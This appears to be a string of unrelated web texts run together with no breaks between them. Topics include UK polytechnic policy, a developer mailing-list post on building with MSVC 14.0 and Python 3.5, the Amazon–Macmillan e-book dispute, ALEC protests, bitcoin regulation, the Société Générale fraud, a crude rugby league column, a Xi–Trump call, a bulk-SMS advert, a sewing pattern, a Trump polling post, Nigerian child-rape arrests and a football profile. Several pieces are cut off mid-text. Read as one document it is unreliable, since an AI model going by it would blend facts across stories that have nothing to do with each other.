The authors say reviving polytechnic status would give vocational learning a much-needed boost in an economy which suffers from "significant shortages" of technical skills.
Increasingly complex technology in industries from manufacturing and engineering to pharmaceuticals and broadcasting mean these shortages are becoming worse, they argue.
The authors back initiatives such as high-quality apprenticeships and the planned technical baccalaureate for school leavers.
The vocational route should no longer be "seen as the track for those who have failed academically", they argue.
"There is a crucial role here for higher-level qualifications, provided by further education colleges."
The report highlights two colleges, Newcastle College and New College Durham, which were in 2011 given the power to award their own foundation degrees.
Other colleges have already applied for the same power and the report argues that more should follow, adding that "large further education colleges providing higher education should be given the ability to award degrees and such colleges should be granted the renewed use of the title, polytechnic".
The authors also say the current student funding system is unsustainable, unfair and needs reform. They suggest a number of possible alternatives.
Lower fees
In particular they recommend new lower fee degrees for vocational students living at home.
Degree courses costing £5,000 a year instead of the current £6-£9,000 would be open to "local students who would be eligible for fee loans but not maintenance support".
"Many of these places would be offered by the new polytechnics and further education colleges in partnership with universities".
Gill Clipson of the Association of Colleges called the £5,000 degree plan "a welcome opportunity" however she was less convinced of the need for the title 'polytechnic'.
"This is a question not so much about an institution's title but of the value placed upon the distinctive, specialist, high-quality provision already on offer," she said.
A spokesman for the Department of Business, Industry and Skills said "This is a useful contribution to the debate on how to maintain and improve the reputation of our world-class university sector.
However, the alternative undergraduate funding models that are discussed would cost more for families, taxpayers and graduates while doing nothing to improve the student experience."
Efforts to support MSVC 14.0
On 07.09.2015 08:43, David Ostrovsky wrote: > * Python 3.5 upgrade is needed to support new compiler: [3]. I don't > have access to Mac OS X atm. Can someone check why Jenkins job on this > platform is failing: [4]? Moreover new Python release has announced to > discontinue support for older MS compilers (VS 2013). We never dropped > support for older compiler during introduction of a new one, right? Or > would this be a option? as Norbert already said, a "flag day" to require new compiler is not an option. unfortunately CPython 3.5 has removed the project files for older MSVC versions. (btw, there is an RC3 already now) this leaves several bad options to deal with the transition: 1. bundle 2 different pythons depending on MSVC version (eek!) these would have different sets of patches, and the build system would probably need to check PYTHON_VERSION_MINOR in some places to do different things. 2. patch in the old PCbuild dir from a previous release as PC/VS10.0 dir (eek!) it looks like that was removed with the following changeset: changeset: 93858:5754f069b123 user: Steve Dower <steve.dower at microsoft.com> date: Sat Nov 22 12:54:57 2014 -0800 summary: Issue #22919: Windows build updated to support VC 14.0 (Visual Studio 2015), which will be used for the official 3.5 release. no idea how much work that would be and how many refactorings that happened upstream since November aren't reflected in the deleted project files. 3. always --disable-python for now on MSVC2015 builds we can switch at a later point, when we switch the release builds to MSVC 2015 (and then enforce --disable-python for MSVC2013). or do it temporarily until we decide to do 1. or 2. :) of course nothing prevents having the patch in gerrit to upgrade to python 3.5 for those using MSVC2015. so which option is the least bad? hard to predict which of 1. or 2. would be more work.
If you want to buy Hilary Mantel's popular, prizewinning "Wolf Hall" from Amazon.com today, you'll be getting it from some third-party vendor. Same for Orson Scott Card's "Hidden Empire" and the Hungry Girl cookbooks. In the place where the Amazon price should be, you'll find only a double dash.
That's because those books are all published by Macmillan, and Amazon has pulled all Macmillan books from its cybershelves. Macmillan, one of the big six publishers, includes publishing houses Henry Holt & Co., science fiction-focused Tor/Forge and the Tiffany of fiction, Farrar, Straus and Giroux.
Apparently the dispute arose from tensions over e-book prices. Amazon likes $9.99 for e-books, but publishers do not. The New York Times reports:
A person in the industry with knowledge of the dispute, which has been brewing for a year, said Amazon was expressing its strong disagreement by temporarily removing Macmillan books. The person did not want to be quoted by name because of the sensitivity of the matter. Macmillan, like other publishers, has asked Amazon to raise the price of e-books to around $15 from $9.99.
The $9.99 price is a loss leader for Amazon, which has used it to help gain e-book market share for its reader, the Kindle. Publishers are concerned about the downward pressure on prices.
Up until Tuesday, a publisher like Macmillan had no real alternative if it was unhappy with Amazon's e-book prices. But when Apple announced its iPad and an upcoming iBook Store on Wednesday, the e-book landscape changed. Five publishers were announced to be working with Apple; Macmillan is one of them.
The dispute between Amazon and Macmillan has bled beyond e-books, however. All formats of Macmillan books are now unavailable for purchase from Amazon. And that may be tough on the publisher.
Who loses? Will people seeking Macmillan hardcovers and paperbacks on Amazon buy from the secondary retailers? Will rival online retailers Barnes & Noble and the independent Powell's see a sudden bonanza? Will people leave their screens and walk into their local bookstores to get "Wolf Hall"? Or will they simply get "The Help" instead?
After the jump: on e-book pricing
INDIANAPOLIS -- More than one hundred protesters gathered downtown Wednesday to voice their opposition to the American Legislative Exchange Council, also known as ALEC.
ALEC is holding its annual meeting in Indianapolis July 27-29, and it's not sitting well with groups like Common Cause Indiana, the Citizens Action Coalition, the Indiana State Teachers' Association, AFL-CIO and the Center for Media and Democracy, which runs the website http://www.alecexposed.org .
CALL 6 | ALEC's secretive meeting in Indianapolis draws criticism
Although ALEC will not disclose a list of its members or conference attendees, Call 6 Investigates saw corporations and lawmakers from all over the country at the JW Marriott, where the conference is being held.
“ALEC members are voting behind closed doors with unelected corporate lobbyists and special interest groups,” said Lisa Graves, a spokesperson with the Center for Media and Democracy. “People have the right to know if their lawmakers are involved in a pay to play operation. It really is about getting corporations into a room, sort of one-stop shopping to come and influence lawmakers.”
ALEC staff allowed RTV6 cameras inside certain meetings, including a Homeland Security session in which IMPD Chief Troy Riggs talked about public safety during large events.
However, our cameras were not allowed to record inside subcommittee meetings or workshops.
“The one thing they won't let you get on camera is those corporate lobbyists voting as equals with lawmakers on bills which happens when you're not there, and the public isn't there," said Graves. “Some of the biggest corporations in the world are paying for a seat and a vote at ALEC task force meetings, which are closed to the press and public, so you don't get to see them vote.”
Call 6 Investigates Kara Kenney spotted ALEC members Rep. Denny Zent (R-Angola) and Sen. Jim Buck (R-Kokomo), who is also on ALEC's board of directors. Read a transcript of her interview with Buck below: Call 6: Are corporate interests writing these laws and then you just put your name on it? Buck: No, I don't know of legislation that a corporation has drafted. Almost all that I'm aware of come from legislators across the country Call 6: What do you make of all the criticism of this organization that you're strongly associated with? Buck: Well, we have different philosophies. We believe in limited government. They believe in large government. Call 6: Are you going into backrooms with corporate lobbyists, making legislation? Buck: We're no more in the backrooms than unions are in the backrooms deciding their strike targets. Call 6: Talk to me about the parties lawmakers attend that are sponsored by tobacco companies, like the cigar party. Buck: I can assure you, that's not going to influence anyone's vote as to whether they've been given a cigar to smoke. Buck said the ALEC process actually saves the state of Indiana time by vetting legislation through opponents before it reaches the statehouse.
While ALEC helps pay for legislators' travel to ALEC conferences, Call 6 Investigates found some Indiana lawmakers travel to conferences, including ALEC meetings, using help from taxpayer money.
“Reimbursement for legislative business is funded out of the state budget,” said Zach Wampler, administrative assistant for the Indiana Legislative Services Agency.
Records show Senator Buck asked Indiana taxpayers to help reimburse his ground transportation to several recent ALEC meetings, including a $74.18 reimbursement for the ALEC meeting in Wisconsin, a $74.18 reimbursement for an ALEC tax & fiscal task force academy in California, $74.18 for the ALEC task force academy in Phoenix in December 2015, and $68.04 for the ALEC spring task force in the spring of 2016.
Other lawmakers who recently sought reimbursement from the Indiana budget for ALEC events include Rep. Bob Heaton (R-Terre Haute) and Rep. Curt Nisly (R-Goshen) who each requested $400 for conference registration for an ALEC meeting in Scottsdale Arizona and Rep. Dale DeVon (R-Mishawaka) submitted $2,232.20 for the same meeting.
DeVon's reimbursement request included lodging, baggage, airfare and registration for the ALEC policy summit held in December 2015.
ALEC spokesperson Bill Meierling said it's a misconception that ALEC or corporate lobbyists are drafting legislation inside the meeting rooms.
“Often times these are already state law,” said Meierling. “A legislator may have written it in their state and they're proud of their work. We create the environment for them to share and exchange ideas, but they are their ideas and their ideas alone."
Meierling said ALEC will not disclose its list of members.
“We have a proven track record of our members being intimidated,” said Meierling. “There are groups out there that disagree with free market principles.”
Meierling said the protesters should come to the JW Marriott and have a discussion.
“Our organization is focused on engagement and discussion, and you can't engage from across the street,” said Meierling.
According to CCN, a high ranking European Union official has dismissed suggestions of the EU looking at regulating bitcoin markets and exchanges.
In an interview with Bloomberg, Pierre Moscovici – European Union Commissioner for economic, financial affairs, taxation and customs, played down talk of supposed EU-wide bitcoin regulations while revealing the EU's view of the cryptocurrency.
“At this stage, we do not consider [bitcoin] as an alternative currency,” Moscovici said, comparing the world's first decentralized cryptocurrency to EU's fiat currency, the Euro.
“We see that there is quite a lot of speculation about that,” added the official, who previously served as the Minister of Finance for France between 2012-14. Moscovici then referenced recent remarks from former US Fed Reserve chairman Alan Greenspan who said “bitcoin is a really fascinating example of how human beings create value” while deeming it an irrational currency.
Notably, Moscovici went on to confirm that while the EU had studied bitcoin, the authority isn't pressing ahead with any regulatory oversight into European bitcoin markets and exchanges. Not yet, anyway.
He stated:
We looked at that [bitcoin], we analyzed the fundamentals but we don't think we have to react at this stage as a political and technical body.
“No we are not having those conversations right now,” stressed Moscovici, when asked explicitly if the EU was in talks with European regulators about introducing regulatory frameworks for the cryptocurrency.
Curiously, the EU official's remarks are in direct contrast to those of Valdis Dombrovskis – vice president of financial stability, financial services and capital markets at the European Commission, the executive arm of the European Union.
“In recent weeks, bitcoin has our heightened attention,” said Domrovskis, speaking to reporters on a public news conference last week. The official also reportedly sent letters to banking and markets watchdogs across the EU, urging them to warn adopters of risks in investing in cryptocurrencies.
Jerome Kerviel, the reported rogue trader
The bank said the fraud was based on simple transactions, but concealed by "sophisticated and varied techniques".
While Société Générale has yet to name the trader, media reports say he is 31-year-old Frenchman Jerome Kerviel.
The losses are four times greater than those made by Nick Leeson, the rogue trader who brought down Barings Bank.
Leeson was sentenced to six-and-a-half years in jail.
'A daily occurrence'
Speaking to the BBC, Leeson said he was not shocked that the latest fraud had taken place - only its scale.
"Rogue trading is probably a daily occurrence within the financial markets," he said.
"What shocked me was the size. I never for one moment believed it would get to this degree of magnitude, this degree of loss."
Société Générale's shares, which were suspended in the morning, ended the day down 4.1%.
'Alone'
According to reports, Mr Kerviel worked at the bank's Delta One products team in Paris.
The sheer scale of the loss is overpowering
Robert Peston,
BBC business editor
Read Robert's report in full How traders turn rogue
Although Société Générale has yet to confirm his name, it did say that the trader was a Frenchman in his 30s who joined the bank in 2000 and earned a salary and bonus of less than 100,000 euros.
He was responsible for betting on the markets' future performance, bank executives said.
"I'm convinced he acted alone," said Jean-Pierre Mustier, chief executive of the corporate and investment banking division, who interviewed the trader after the fraud was uncovered.
Société Générale said the trader had taken what it called "massive fraudulent directional positions in 2007 and 2008 beyond his limited authority".
Executives said the trader may not have sought personal gain from the fraudulent deals.
The fraud is an extraordinary echo of the rogue trader, Nick Leeson, who caused the collapse of Barings Bank in 1995, says BBC business correspondent Nils Blythe.
But the losses uncovered by Barings bosses totalled just £860m - about a quarter of the amount lost by Société Générale.
'Secret trade'
The bank, one of France's largest, will need to seek 5.5bn euros in new capital to offset the losses.
Société Générale IN FIGURES Founded in 1864 467bn euros in assets under management (as of June 2007) 22.5m customers worldwide 120,000 employees in 77 countries
Société Générale share price
But it said it would still make a profit of 600m to 800m euros for 2007, despite the blow to its balance sheet.
The bank said the trader responsible for the fraud had "in-depth knowledge of the control procedures resulting from this former employment in the middle-office".
"The transactions which involved the fraud were simple - taking a position on shares rising - but hidden using extremely sophisticated and varied techniques," chief executive Daniel Bouton said in a letter to the bank's customers.
The bank said that the trader had confessed to the fraud and was being dismissed. His managers were to leave the bank as well.
"I am sorry but I have a hard time buying the fact that a trader was able to set up a 'secret trade' of 4.9 billion without anybody finding out," said Ion-Marc Valhi at Amas Bank.
Frederic Hamm, fund manager at Agilis Gestion, believes that the fraud "impacts the reputation of the bank".
Mr Bouton offered his resignation but it was rejected by the board, the bank said.
Richard Fuld, the chairman of Lehman Brothers, told BBC News in Davos that "nothing stuns me, nothing really surprises me these days."
'Unprecedented event'
The bank's losses have seriously dented its profits for 2007.
SOME MAJOR BANK FRAUDS 2008: Société Générale, alleged fraud by a trader, 4.9bn euros loss 2002: former currency trader accused of hiding $691m in losses at Allfirst bank of Baltimore 1995: UK's Barings Bank collapsed after a trader Nick Leeson lost £860m ($1.28bn at the time) on futures trades
The company will announce its full year results on February 21, and it said that it expects its 2007 net income to be in the range of 600m-800m euros.
Shares in Société Générale have fallen by nearly 50% in the past six months.
Société Générale is also going to raise 5.5bn euros through a capital increase "to strengthen its capital base".
Meanwhile, another French bank, BNP Paribas, said that "it has not revealed any loss of item that would justify any particular warning to the market".
Gilles Glicenstein, BNP Paribas Investment Partners chief executive, suggested that "there is still some information missing understanding what happened" at Société Générale.
"Because the scale of the fraud is so large, there must be a complex explanation... For Société Générale, it's an unprecedented event," he added.
Mr Glicenstein also said it was not good news for banks in general, as "it can create doubt".
"In other periods, this type of news was hidden, but today, there is a tendency to reveal everything and maybe it's by revealing everything that confidence can return," he said.
French Prime Minister Francois Fillon said that Société Générale "has taken serious measures to cope with the situation".
"I note too that the Bank of France has indicated that there is no reason to have any worries about the health of this bank and I am happy with that," he added.
Or Joel Monaghan receiving fellatio from a dog. But he did. Or Nate Myles doing a poo in a hotel foyer in Terrigal. But he did. Or Julian O'Neill doing a poo in the shoe of teammate Jeremy Schloss.
But he did. Or Julian O'Neill setting fire to Danny the Dolphin. But he did. Or Julian O'Neill … Look, I understand what Bird has done isn't a great look. Another embarrassing headline. Terrible timing for Gold Coast boss Graham Annesley, who is searching for corporate support for an ailing club.
So throw the book at Bird. Strip him of the Titans captaincy. Slap him with a fine. Order him to undergo a course on the best and worst places to urinate, and how vehicles belonging to law enforcement is right up there with those belonging to your new in-laws as a no-go zone. Sack him so he can do it really tough, playing for big bucks in the south of France. Again. And, yes, if I were a mother of three young children this would potentially turn me off allowing them to play the (alleged) the greatest game of all. But, to be perfectly honest, I would be more concerned about them having their necks screwed off in a wrestling move from a kid almost double their size. And I'm not a mother of three. I can barely look after a - or a pot plant - let alone a child.
I am a not-so-young man who likes to - eek! - drink beer in a pub alongside my mates and rip the living daylights out of everyone and everything. There's a few of us still around, isn't there? Hello? And I can tell you we have been laughing into our schooners of organic Coopers Pale Ale about Birdy. The jokes cannot be repeated in a family newspaper/website/iphone-and-ipad-application like The Sydney Morning Herald, but believe me THEY WERE HILARIOUS. As for Facebook, it's been in meltdown. I'd rather Greg Bird jokes than another mind-numbing storm picture. Here, in December, I couldn't have cared less about the next NRL season.
Now? Now all I want to do is sit in the stands and listen to the one-liners hurled at G Bird when he plays his first match for the Titans. Can you imagine the comedy gold they're already conjuring in Queensland ahead of next year's Origin series? Can you imagine? Well, yes, you have a point: they're probably not capable of anything better than, "Hey! Birdy! How was your bridal shower?" But they'll think of something, bless 'em. Former NRL boss David Gallop often refuted the notion that "the soap opera of rugby league is good for the game".
But he had a jaundiced view because he had to front press conference after press conference and tsk-tsk-tsk each incident with a straight face, when surely he was laughing on the inside. So let's introduce some sanity to proceedings. Some rare perspective. Or maybe just lighten up a bit. Bird weeing on or near a cop car is not domestic violence. It is not a sexual assault allegation. It is not drink driving. It is not stomping on some punter's head and then going to the Big House for it. It is not the use of a banned substance. It is not a salary cap rort. Nor will those three children I will never raise suddenly learn that Bird has whizzed on a police car and suddenly feel emboldened to do something similar. People are not going to start brazenly writing their initials on the side of a divvy van with their urine before heading home in one. So shelve your outrage and reverse park your righteous indignation and cut out to gibber about rugby league being a dead-game-walking and let's embrace what it is: a sport played by young blokes, not all of whom are the coldest cans in the fridge.
We love rugby league because of its boganism. It's time rugby league embraced its boganism, because deep, deep down, we're all bogans, too. "I did know it was a marked police car, but it wasn't on the car!" Bird exclaimed. Because not weeing on the police car, just near it, makes a whole lot of difference. You cannot make this stuff up. CLARKE'S LEADING EDGE
So, will the events of the last few days finally silence the Michael Clarke doubters/critics/haters? Just over a week ago, Clarke was in the back bar of the Macksville Ex-Services Club at the wake of his departed friend, Phillip Hughes. While other Australian players drank water, Clarke was understandably raising a vodka or seven to the late batsman. There was no real indication in that moment that he was ready to play cricket, even if the strong belief among teammates and officials was that he would in the first Test against India in Adelaide. The manner in which Clarke bravely scored a century despite back spasms, basically playing at balls like he was using a fly swatter because he was so restricted with pain, is surely one of the bravest things we've seen from someone in a baggy green. Clarke is the most maligned Australian cricketer in history, no doubt. In January 2011, as he bounced out to bat for his country at the Gabba in a one-day match, he was booed by the home crowd. He was captain.
Juxtapose this with the scene over the first two days at Adelaide Oval, when he was given a rousing standing ovation. As he's said before, "I've said it a million times. It's all about respect, about continuing to earn the public's respect. That's all I ever wanted." Surely, now – surely! – he's got it. MOROCCAN AND REELIN' The standoff between Western Sydney Wanderers management and players might have eased but don't expect that to be the end of the matter.
The club's hierarchy have kept their powder dry over the pay dispute, opting not to engage in a slanging match, but make no mistake that senior figures at the Asian champions are filthy with the way the saga has played out and the embarrassment it has caused them on the world stage as they prepare for the Club World Cup in Morocco. There are likely to be significant ramifications when the team arrives home and the so-called ringleaders - senior players Shannon Cole, Ante Covic and Nikolai Topor-Stanley - could be in the firing line, with serious questions being raised about their playing futures at Pirtek Stadium. How that unfolds is yet to be seen but don't be surprised if they're told to look elsewhere. In the instance of goalkeeper Covic, at 39 he might have hoped to sashay into a post-career gig with the Wanderers when he retires but the chances of that are now virtually zero. BATH SET TO THROW SAM IN AT DEEP END Clive Churchill Medallist Sam Burgess is tipped to make his starting debut for English rah-rah side Bath this weekend.
Twin brothers George and Thomas will be in the crowd for the European Champions Cup match against Montpellier, so that's a strong indication it will be so. It's another step for Big Samuel in his pursuit of a berth at next year's Rugby World Cup, where he wants to play for England. He's played a handful of minutes off the bench thus far, and only been required to make a handful of tackles thus far, too. Last weekend, two of them earned penalties for being too high. You can take the boy out of rugby league, but you can't... NO BACKING FOR PACKER If this column happened to be a betting man - ha! - it would be putting everything including the landlord's kitchen sink on Russell Packer not playing in the NRL any time soon.
Dragons coach Paul McGregor launched an impassioned plea for the jailed prop to be allowed to play after he walks out of Silverwater in January. That's when the former Warriors forward will have served a year-long sentence after he was found guilty of assaulting another man in Sydney, which included stomping on the unconscious victim's head. We've been told by several people that Packer will leave jail a vastly different man to the one who went in. There is a decent soul there, even if most of us can't see it. But the NRL has been standing firm on this one for months now. We're not expecting a change of heart, until well into next year at least. THE QUOTE
"I've been back on the fitness regime. The 32 jeans have been fitting nicely but I might just ruin it this week." - And they reckon Shane Warne is superficial. THUMBS UP Take emotion away from sport and it's just one bloke throwing a ball at another bloke holding a bat in front of three sticks. The emotion at Adelaide Oval over the past few days, as Australian players look skyward at Phillip Hughes, has been profound. THUMBS DOWN The apple doesn't fall too far from the tree, as they say. What other assumption could you make after watching John Hopoate shoulder a female radio reporter outside of court on Wednesday after his son, promising Sea Eagles playerJamil, was sentenced to a year in jail for assault.
It's a big weekend for … the Wanderers, as they shrug off a pay dispute to take on Mexico's Cruz Azul in the FIFA World Club Cup on Sunday morning in Morocco, with a showdown with Real Madrid beckoning. It's an even bigger weekend for … Australian racehorsies Buffering and Criterion as they represent our fair nation in the Hong Kong International Sprint at Sha Tin on Sunday. They're up against some serious horseflesh. Good luck to them, and to you.
BEIJING (AP) — Chinese President Xi Jinping told President Donald Trump in a phone call Wednesday that Beijing is willing to work with Washington on ending North Korea's nuclear weapons program but wants a peaceful solution.
US President Donald Trump with Chinese President Xi Jinping at the Mar-a-Lago estate after a bilateral meeting in Palm Beach, Florida, on Friday. REUTERS/Carlos Barria BEIJING — Chinese President Xi Jinping told President Donald Trump in a phone call Wednesday that Beijing was willing to work with Washington on ending North Korea's nuclear weapons program but wanted a peaceful solution.
Xi's comments come after the US president tweeted that China should do more on the issue Washington sees as an increasingly urgent threat, or the US would go it alone.
The call, brief details of which were released by the Chinese foreign ministry, also come as tensions have risen with the deployment of a US aircraft carrier to the area and the conducting of the biggest-ever US-South Korea military exercises.
Xi told Trump that China insisted on peace and stability on the Korean Peninsula and wanted to find a solution to the problem through peaceful means.
"China insists on realizing the denuclearization of the peninsula ... and is willing to maintain communication and coordination with the American side over the issue on the peninsula," Xi was quoted as saying by the state broadcaster CCTV and other official media outlets.
The two leaders spoke Tuesday night Washington time.
Earlier Tuesday, Trump tweeted that he tried to persuade Xi to put pressure on North Korea in exchange for a good trade deal with the U.S.
"I explained to the President of China that a trade deal with the U.S. will be far better for them if they solve the North Korean problem!" Trump tweeted.
In a second tweet he wrote: "North Korea is looking for trouble. If China decides to help, that would be great. If not, we will solve the problem without them! U.S.A."
Trump and other US officials have repeatedly called on China to leverage its status as North Korea's biggest economic partner and source of food and fuel aid to force Pyongyang to abandon its nuclear weapons program.
China responds that it is in full compliance with sanctions enacted under UN Security Council resolutions and in February, suspended imports of coal from North Korea — a key source of foreign currency for Kim Jong-un's hard-line Communist regime.
However, Beijing also says it will not countenance measures that could bring about a collapse of the regime that could release a flood of refugees across its border, destabilize northeast Asia, and result in a US-friendly government taking power in Pyongyang.
Send text messages online for better business communication.
Sending mass SMS from mobile phones isn't a wise idea, especially when it comes to business communication. With the help of our online SMS service, you can now send text messages and SMS from computers on a large scale and in a convenient manner.
Our web SMS services enable you to communicate with your colleagues, employees, suppliers, customers, affiliates and others by sending bulk text messages via our Messaging Platform. With our years of experience, we have developed a mass SMS solution that allows you to send text to phone from a computer, without downloading any software.
BroadNet S.A.R.L simplifies the process of text messaging from a computer by helping you to send to any number of people at any time.
Our online text message service gives you the power to send text messages from a computer to an unlimited number of people, within a short period of time, in the most cost-efficient ways.
Today we are excited to share the New Sorbetto with you! We originally released Sorbetto back in 2011 as a free downloadable top designed to teach fundamental sewing skills. Six years later, we wanted to update this Colette favorite. This updated pattern includes two new versions, a new and improved fit, and updated pattern instructions.
New Fit and Look
Since 2011, we have updated our size range to include sizes 20-26. In recent months, we have also actively sought your feedback. All of these factors lead us to creating new misses and curvy blocks.
The New Sorbetto is drafted using our new blocks. It features a new fit across both misses and curvy sizes. Sorbetto is our way of sharing the new fit with you—for free!
Our signature in-depth pattern instructions have been updated with a new look. We also added both misses and curvy illustrated fit guides and personal measurement keys to help you achieve the perfect fit.
New Split Sizing
Moving forward, our patterns will include two different size ranges. This means that you can choose our misses size range (0-16, XS-L) or our curvy size range (18-26, XL-3X). Sizes 0-16 are drafted for a C cup and sizes 18-26 are drafted for a DD cup.
The process of drafting both size ranges is exactly the same, but each size range is created from a different starting point, depending on the body type it's created for. If we were to use only one body type, the fit for many people would suffer. This is why we have a separate block and fit model for each size range—so that both size ranges get the look that best suits them.
Digital patterns, like the New Sorbetto, include both layouts, making it easy to blend between sizes. You can read even more about these changes here.
Version 1 of the Sorbetto top features a center front box pleat and bust darts for shaping. Bias tape finishes the modest scoop neckline as well as the armholes.
Version 2 of the Sorbetto top features a center front box pleat and bust darts for shaping. Bias tape finishes the modest scoop neckline as well as the armholes. This tunic length version has a side seam vent and slight high-low hem, which is finished with a facing.
Version 3 of the Sorbetto top features a center front box pleat and bust darts for shaping. Bias tape finishes the modest scoop neckline. This version includes short set-in sleeves that are finished with a baby hem.
Join the Sewalong
To celebrate the New Sorbetto, we will be hosting a sewalong. Together, we'll make all three versions of this lovely top. This sewalong will be co-taught by myself (Haley) and my pal and fellow sewing expert, Katie.
This is, I believe, his first lead in any national poll. One word, my friends: Yuge.
The bad news: More than four in 10 Republicans say they don't like him, so if he hangs around long enough to be part of a two- or three-man race, he'll meet some entrenched opposition among voters he's trying to win over. The good news: His favorable rating, which has been abysmal in some polls, is now net positive in YouGov's. A month ago, on June 15, they had him at 38/47. Today he's at 49/43.
Don't forget to thank the many GOP pols who made all of this possible, says Mickey Kaus, starting with Marco Rubio.
When voters are continually betrayed by those they put in office, they often resort to unapproved methods. I remember when David Duke was almost elected to the Senate from Louisiana in 1990. He got 43% of the vote! Were that many voters racists? I doubt it. Why would they vote for him, then? Well, take one of Duke's issues, welfare. For decades, conservative voters had supported politicians who promised to cut welfare, end welfare, support workfare instead of welfare–only to see welfare spread to cover more of the population. Voters didn't understand there were children on welfare! Recipients had “barriers to employment”! You couldn't expect them to work! Etc. Louisiana voters may have figured, “Everyone we elect sells out on this issue. But this guy Duke's a f**king racist maniac! At least he won't sell out.” Wackiness and bigotry became markers for “he means business.” A similar, though less extreme, dynamic is clearly working in favor of Donald Trump.** Republican voters have sent lots of politicians to Washington who promise to get tough on border control and wind up supporting amnesty within about 35 minutes of their arrival. Marco Rubio, come on down!
Lotta truth to that. Are you sure President Trump won't be suckered into a Rubio-esque amnesty 35 minutes after he's sworn in, though? Here's a choice bit from last night's interview with Anderson Cooper:
TRUMP: I would do something very, very strong. Number one I wouldn't think about anything until I built a wall. Impenetrable. There will be nobody coming in to this country illegally. That's number one. Number two, I will get ones that are criminals, drug dealers, and the people that are forced in by Mexico and you know exactly what I am talking about, because Mexico is smarter, and sharper, and more cunning, and frankly, have much better negotiators than we have. And I would get ones that are forced in by the country of Mexico, into our country. Forced in, those people would get out and they get out fast. The rest I would be looking at very seriously. But I will– COOPER: When you say looking at seriously would there be a pathway to citizenship or I mean, you are talking 11 million at the very least. TRUMP: It is too early for me to say. And when you say citizenship, the most we would be talking about was legal. But let me just tell you before I even think about that. We have to build a, we have to build a wall, a real wall. Not a wall that people walk through.
So, a path to legalization potentially — the same thing Jeb Bush and Ted Cruz support, and a solution that's destined to lead to citizenship once legalization is achieved and illegals are no longer removable. Even the GOP's loudest anti-illegal voice won't commit to Romney-style “self-deportation” this time around. Huh.
As for Trump's claim yesterday that he'll win the Latino vote if nominated, let's check today's crosstabs to see how that's going. YouGov polled people on how favorably they view each of the 16 GOP candidates now in the race. Excluding Trump, the least popular Republican with Hispanics would be Chris Christie, who's viewed somewhat unfavorably by 25 percent and very unfavorably by 19 percent for a total of 44 percent. Right behind Christie at 43 percent are Rick Perry (20 percent somewhat unfavorably and 23 percent very unfavorably), presumably for his vocal support for better immigration enforcement during last year's border crisis, and Marco Rubio(!) (21/22). Trump's numbers, though, dwarf all of theirs:
Hispanics aren't his worst group — he's viewed “very unfavorably” by more than 60 percent of blacks, probably because of his “where's the birth certificate?” shtick — but his 28/61 split among Latinos is easily the worst in the GOP field. In particular, his 51 percent “very unfavorable” rating is more than twice as bad as the next most unpopular Republican with Latinos (Rick Santorum at 25 percent). That's why Reince Priebus and the RNC wanted to make sure the media knows that he'd phoned Trump and asked him to tone down his immigration rhetoric. Priebus realizes Trump won't listen to him, he just wants it on record that the party's trying to get him to stop so that Latinos won't hold their hard feelings towards Trump against the rest of the party. Think it'll work? Watch the new ad from the DNC below, which conveniently omits the fact that every last Republican running this year with the possible exception of Trump is prepared to grant illegals some form of legalization once the border is “secure.”
Exit question via Jim Geraghty: Do Trump and his fans even want to persuade others?
A 38-year-old pastor, Ogbomo Jerry, has been arrested by the Bayelsa State Police Command alongside six others for the alleged rape of an 11-year-old girl and two 8-year-olds.
The cleric reportedly lured the victim to his office at Aduleama in Amassoma community of Southern Ijaw Local Government Area, LGA, of the state and raped her.
Confirming the arrests, the state Commissioner of Police, CP, Mr. Adeyemi Ogunjemilusi, while parading the suspects at the command in Yenagoa, the state capital on Friday said, “Also arrested on October 6 was one 21-year-old Emanso David, who is a carpenter, for luring an eight-year-old into his workshop at Igbogene Market and raping her.
“He further threatened to kill her if she tells her mother.
“Also on October 14, another suspect, Atika Eguini, lured another eight-year-old old into his house in Okriama Compound in Amassoma and had canal knowledge of her.
“The victim confirmed that she had been lured thrice by the same man anytime her elder sister travelled.
“The other four suspects, Godwin Governor, 20, Kingsley Akpas, 21; Ebikewenemor Aripamone,18, and Harrison Ebibo, were apprehended over the rape of a 19-year-old girl in the state,” the CP added.
Darren Fletcher has had a career that will soon be looked upon with fondness by many, but the story he has written was not always such a fairy tale.
Darren Fletcher Ethcing His Name In The West Brom History Books
After the issues he had with Manchester United that saw his career at Old Trafford end shorter than expected, he made his way over to West Bromwich Albion, and no one knew where his story would go from there.
Manchester United
Fletcher was nothing short of a success at Old Trafford and supporters of the Red Devils still look upon him with a positive light. He was a fantastic servant of the club, making 223 appearances and scoring 18 goals during his tenure in Manchester.
Aside from the amount of appearances, he made himself a fan favourite with the Stretford End faithful with performances that any midfielder would be happy to put out.
Arguably one of the best moments the Scot had at United was scoring the lone goal for the Red Devils in a 1-0 win over Chelsea to end their London-based rivals' 40-match unbeatean streak, a day that won't soon be forgotten. He would go on to have another six years of success with Manchester United before his misfortunes arose.
#OTD 6th Nov 2005
Darren Fletcher ends Chelsea's 40-match unbeaten run in the #PL as Manchester United defeat the Blues 1-0 pic.twitter.com/aOjgXgQD4k — FOX SPORTS News (@FOXSportsNews) November 5, 2016
The 2010-11 season was the campaign in which the dark clouds began to grow over the career of the Scot in the North West of England. Fletcher was having another solid season by any account when a gastrointestinal issue popped up, seemingly out of nowhere. This illness would see him sidelined for a number of months. His next appearance would be in September of 2011 in the UEFA Champions League against Benfica.
The gastrointestinal problem that Fletcher had, and the one that would seemingly end his career as a Red Devil, was diagnosed as ulcerative colitis. According to the Mayo Clinic, this disorder has common symptoms of abdominal pain, cramping, weight loss, fatigue, fever and multiple other more severe symptoms.
For a footballer at the level Fletcher was playing, this is nothing short of a career death sentence. But out of the ashes grew a pheonix, this time in the form of West Bromwich Albion.
West Bromwich Albion
Fletcher signed for the Baggies on a free transfer on February 2nd, 2015. This would prove to be a very smart piece of business for a mid-table club. Despite Fletcher being diagnosed with ulcerative colitis, Tony Pulis decided to take a chance on the player.
This gamble would turn out to be an integral piece of a squad looking more and more comfortable in the Premier League.
During his time at The Hawthorns, Fletcher has brought a sense of composure and confidence to the midfield for the Baggies that they had previously lacked. He hasn't had numbers that are world-class, but for a club such as West Brom he has been a difference-maker of the utmost proportions with his play and with his leadership.
In his first season with West Brom, Fletcher made 15 appearances in the league during the second half of a season that would see the Baggies finish safely in 13th place. During his short stint during that term, he completed 79.7% of his passes and scored a goal as well.
Not bad for a man who many thought would struggle to make appearances on a consistent basis.
Fletcher has struck much the same chord he did in those first 15 appearances as he has in the last 53 in the league as well. In the 2015-16 season, he appeared in all 38 matches for the Baggies.
